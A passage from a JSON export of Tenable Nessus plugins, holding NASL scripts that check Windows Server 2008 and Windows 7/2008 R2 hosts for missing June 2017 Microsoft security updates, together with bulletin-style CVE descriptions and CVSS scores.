script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-06';\n\nkbs = make_list(\n \"3217845\",\n \"4018106\",\n \"4021558\",\n \"4021903\",\n \"4021923\",\n \"4022008\",\n \"4022010\",\n \"4022013\",\n \"4022883\",\n \"4022884\",\n \"4022887\",\n \"4024402\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n 
audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif (hotfix_check_fversion_init() == HCF_CONNECT) exit(0, \"Unable to create SMB session.\");\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n#\n# 4024402\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"windowssearchengine_31bf3856ad364e35_\", file_pat:\"^mssrch\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('7.0.6002.19805','7.0.6002.24123'),\n max_versions:make_list('7.0.6002.20000','7.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4024402\", session:the_session);\n\n# 4021923\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tdi-over-tcpip_31bf3856ad364e35_\", file_pat:\"^tdx\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19787','6.0.6002.24105'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4021923\", session:the_session);\n# 3217845\nif(\n hotfix_is_vulnerable(os:\"6.0\", arch:\"x64\", sp:2, file:\"hvax64.exe\", version:\"6.0.6002.19783\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3217845\") ||\n hotfix_is_vulnerable(os:\"6.0\", arch:\"x64\", sp:2, file:\"hvax64.exe\", 
version:\"6.0.6002.24101\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3217845\")\n )\n vuln++;\n\n# 4018106\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"rundll32.exe\", version:\"6.0.6002.19770\", min_version:\"6.0.6000.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018106\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"rundll32.exe\", version:\"6.0.6002.24089\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018106\")\n)\n vuln++;\n\n# 4021903\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"shell32.dll\", version:\"6.0.6002.19785\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021903\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"shell32.dll\", version:\"6.0.6002.24102\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021903\")\n )\n vuln++;\n\n# 4022008\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32spl.dll\", version:\"6.0.6002.19783\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022008\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32spl.dll\", version:\"6.0.6002.24101\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022008\")\n )\n vuln++;\n\n# 4022010\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msmmsp.dll\", version:\"6.0.6002.19784\", min_version:\"6.0.6000.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022010\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msmmsp.dll\", version:\"6.0.6002.24102\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022010\")\n )\n vuln++;\n\n# 4022013\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntoskrnl.exe\", version:\"6.0.6002.19790\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022013\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntoskrnl.exe\", version:\"6.0.6002.24108\", 
min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022013\")\n )\n vuln++;\n\n# 4022883\nif(hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"atmfd.dll\", version:\"5.1.2.252\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022883\"))\n vuln++;\n\n# 4022884\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"gdi32.dll\", version:\"6.0.6002.19787\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022884\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"gdi32.dll\", version:\"6.0.6002.24105\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022884\")\n )\n vuln++;\n\n# 4022887\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19787\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022887\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24105\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022887\")\n )\n vuln++;\n\n# 4021558\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21017\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021558\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.16906\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021558\")\n)\n vuln++;\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:55", "description": "The remote Windows host is missing security update 4022722\nor cumulative update 4022719. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - A remote code execution vulnerability exists in\n Microsoft Office due to improper validation of\n user-supplied input before loading dynamic link library\n (DLL) files. An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0260)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285, CVE-2017-8534)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0286, CVE-2017-0287, CVE-2017-0288,\n CVE-2017-0289, CVE-2017-8531, CVE-2017-8532,\n CVE-2017-8533)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. 
An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8485,\n CVE-2017-8488, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - Multiple remote code execution vulnerabilities exist in\n Internet Explorer due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8519, CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8524)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. 
An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. 
(CVE-2017-8553, CVE-2017-8554)", "edition": 39, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 June 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4022719.NASL", "href": "https://www.tenable.com/plugins/nessus/100761", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100761);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0260\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0286\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n 
\"CVE-2017-8469\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8472\",\n \"CVE-2017-8473\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8488\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8519\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8528\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8534\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\"\n );\n script_bugtraq_id(\n 98810,\n 98818,\n 98819,\n 98820,\n 98821,\n 98822,\n 98824,\n 98826,\n 98837,\n 98839,\n 98840,\n 98842,\n 98845,\n 98847,\n 98848,\n 98849,\n 98851,\n 98852,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98864,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98891,\n 98899,\n 98900,\n 98901,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98929,\n 98930,\n 98932,\n 98933,\n 98940,\n 98942,\n 98949,\n 98953\n );\n script_xref(name:\"MSKB\", value:\"4022719\");\n script_xref(name:\"MSFT\", value:\"MS17-4022719\");\n script_xref(name:\"MSKB\", value:\"4022722\");\n script_xref(name:\"MSFT\", value:\"MS17-4022722\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 June 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4022722\nor cumulative update 4022719. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - A remote code execution vulnerability exists in\n Microsoft Office due to improper validation of\n user-supplied input before loading dynamic link library\n (DLL) files. An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0260)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285, CVE-2017-8534)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0286, CVE-2017-0287, CVE-2017-0288,\n CVE-2017-0289, CVE-2017-8531, CVE-2017-8532,\n CVE-2017-8533)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. 
An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8485,\n CVE-2017-8488, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - Multiple remote code execution vulnerabilities exist in\n Internet Explorer due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8519, CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8524)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. 
An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. 
(CVE-2017-8553, CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022719/windows-7-update-kb4022719\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?43db6287\");\n # https://support.microsoft.com/en-us/help/4022722/windows-7-update-kb4022722\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f131905d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4022722 or Cumulative Update KB4022719.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft\nbulletin = 'MS17-06';\nkbs = make_list(\"4022719\", \"4022722\");\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Windows 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"06_2017\", bulletin:bulletin, rollup_kb_list:[4022719, 4022722]))\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:55", "description": "The remote Windows host is missing security update 4022718\nor cumulative update 4022724. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. 
An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. 
An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted \n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has 